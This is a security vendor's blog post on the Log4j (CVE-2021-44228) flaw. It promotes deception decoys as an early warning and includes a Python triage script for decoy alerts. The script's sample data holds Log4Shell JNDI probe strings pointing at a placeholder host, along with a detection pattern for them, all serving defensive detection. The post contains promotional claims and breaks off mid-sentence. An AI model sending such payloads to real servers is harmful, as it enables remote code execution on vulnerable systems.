Deploy an Early Warning System




The Log4j vulnerability (aka CVE-2021-44228) is one of the most significant vulnerabilities in a decade, which is saying a lot when you hold it up against prominent issues like SolarWinds.






From the moment of disclosure on Friday, December 10th, the Internet has become a scanning zone for Log4j vulnerabilities. Every publicly addressable IP is being scanned. Bad actors are looking for vulnerable systems to infiltrate. Defenders are looking for vulnerable systems to patch. While the focus has been on systems exposed to the Internet, the reality is that many Log4j vulnerabilities will also be visible from inside the network and accessible to both adversaries and insider threat actors. In other words, ignoring vulnerabilities that are not accessible from the Internet is not a sound strategy; these will likely be found and exploited.


Having deception decoys placed in your environment can serve as an early warning system. It helps quickly identify attackers in your environment as they scan for this vulnerability. Specifically, deception technologies like Fidelis Deception® can help protect organizations from zero-day threats before they are published, and before patches or rules are updated. No need to design, configure and tune new rules; once deception is turned on, it can detect the attackers trying to exploit the vulnerability with a near-zero false positive rate.
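As an added illustration (not code from Fidelis or from the original post), the example below triages connection records from decoys: every touch of a decoy raises an alert, and a match on the `${jndi:` lookup prefix only enriches it. The record layout, decoy names, internal ranges and severity levels are assumptions, and the sample events are constructed.

```python
import ipaddress
from collections import defaultdict
from urllib.parse import unquote

# Constructed decoy records: (source IP, decoy name, raw request text).
# Addresses, decoy names and hostnames are placeholders, not real indicators.
SAMPLE_EVENTS = [
    ("10.20.4.17", "decoy-web-01", "GET / HTTP/1.1 | User-Agent: ${jndi:ldap://placeholder.invalid/a}"),
    ("10.20.4.17", "decoy-web-02", "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fplaceholder.invalid%2Fa%7D HTTP/1.1"),
    ("203.0.113.9", "decoy-dmz-01", "GET / HTTP/1.1 | X-Api-Version: ${JNDI:dns://placeholder.invalid}"),
    ("10.20.7.88", "decoy-web-01", "GET /favicon.ico HTTP/1.1 | User-Agent: Mozilla/5.0"),
]
JNDI_MARKER = "${jndi:"  # lookup prefix seen in CVE-2021-44228 probes
# Assumption: the organization's internal address space is the RFC 1918 ranges.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2}  # assumed scale

def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)

def looks_like_log4j_probe(request):
    # Decode percent-encoding once, then compare case-insensitively.
    return JNDI_MARKER in unquote(request).lower()

def triage(events):
    """Group decoy touches by source. No legitimate user has a reason to reach
    a decoy, so every source is alerted on; the JNDI match is enrichment only."""
    by_src = defaultdict(lambda: {"decoys": set(), "log4j_probe": False})
    for src, decoy, request in events:
        by_src[src]["decoys"].add(decoy)
        by_src[src]["log4j_probe"] |= looks_like_log4j_probe(request)
    alerts = []
    for src, entry in by_src.items():
        internal = is_internal(src)
        # An internal source probing decoys points to an adversary or insider
        # already inside the network, so it ranks above an Internet scanner.
        if internal and entry["log4j_probe"]:
            severity = "critical"
        elif internal or entry["log4j_probe"]:
            severity = "high"
        else:
            severity = "medium"
        alerts.append({"source": src, "internal": internal, "severity": severity,
                       "decoys": sorted(entry["decoys"]), "log4j_probe": entry["log4j_probe"]})
    return sorted(alerts, key=lambda a: (SEVERITY_ORDER[a["severity"]], a["source"]))

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

The fourth constructed record carries no recognizable payload and still produces an alert, which is the property that lets a decoy flag activity before any signature exists.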


The Fidelis Threat Research Team has been tracking these scans on both our customer networks and public-facing decoys spread out around the world. Alerts from these decoys are useful in understanding the extent to which Log4j is being exploited. In this blog, we provide an overview of some of th ..
